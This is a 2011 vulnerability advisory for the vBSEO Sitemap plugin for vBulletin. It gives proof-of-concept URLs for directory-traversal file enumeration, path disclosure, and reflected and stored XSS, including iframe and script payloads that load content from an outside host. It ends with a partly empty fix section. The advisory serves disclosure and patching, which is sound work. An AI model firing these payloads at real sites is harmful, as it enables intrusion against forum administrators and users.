vBSEO Sitemap - Multiple Vulnerabilities Versions Affected: 2.5 and 3.0 (Most likely all versions) Info: A proven success record, vBSEO powers the most optimized forums on the Web. The #1 SEO plugin and the only professional, fully supported solution. A full package of SEO enhancements, one install, one upgrade. External Links: http://www.vbseo.com Credits: MaXe (@InterN0T) -:: The Advisory ::- vBSEO is prone to multiple vulnerabilities, such as path disclosure, enumeration of files, persistent and non-persistent XSS. Please see the details below. vBSEO Sitemap 3.0 Gold: Enumeration and confirmation of files: http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?rlist=true&details=../../../vb4_readme.txt http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=../../../../vb4_readme.txt Proof of Concept XSS: (Non-Persistent) http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E Path Disclosure: (any file in the addon directory - includes fatal errors) http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_medialibrary.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links3.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vbagallery.php ----------------------- END OF vBSEO 3.0 ----------------------- vBSEO Sitemap 2.5: (initial first release) Enumeration and confirmation of files: http://www.target.tld/vbseo_sitemap/index.php?details=../../robots.txt http://www.target.tld/vbseo_sitemap/index.php?hitdetails=../../../robots.txt Non-Persistent XSS: (PoC) http://www.target.tld/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E%22;%3C/script%3E [May require bot hits to work!] http://www.target.tld/vbseo_sitemap/index.php?removedl[0]=&botsonly=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E%22;%3C/script%3E http://www.target.tld/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E Path Disclosure: (any file in the addon directory - includes fatal errors) http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links.php http://www.target.tld/includes/functions_vbseo_url.php ----------------------- END OF vBSEO 2.5 ----------------------- vBSEO Sitemap: (Most likely all versions) Persistent XSS: 1) The user-agent is not sanitized in a sufficient way allowing an attacker to inject persistent scripts. 2) Then the attacker must request the sitemap via one of the following links: - http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true - http://www.target.tld/vbulletin/upload/vbseo_sitemap/vbseo_getsitemap.php?sitemap=sitemap_index.xml.gz 3) Then an authenticated administrator must view one of the pages containing the injected and potentially malicious user-agent: http://www.target.tld/vbseo_sitemap/index.php?dlist=true&page=357 [!] All vulnerabilities requires authentication and they do not survive a login screen, making them almost harmless. -:: Solution ::- Before: (file: index.php within vbseo_sitemap) -- Version 2.5 Rem$ After:_______________________________________________________ Rem$ --------------------------------------------------------------------------------------------- Before: (file: index.php within vbseo_sitemap) -- Version 3.0 After:_______________________________________________________ --------------------------------------------------------------------------------------------- In addition, vbseo_getsitemap.php which grabs the unsanitized user-agent can also be fixed by finding this line: 'useragent'=>$_SERVER['HTTP_USER_AGENT'], And changing it to this: 'useragent'=>htmlentities($_SERVER['HTTP_USER_AGENT']), Disclosure Information: - Vulnerability found and researched: ~27th December 2010 - Semi-Disclosed at InterN0T: 30th December - Detailed Disclosure: 31st January 2011 References: http://forum.intern0t.net/intern0t-advisories/3632-vbseo-sitemap-2-5-3-0-multiple-minor-vulnerabilities.html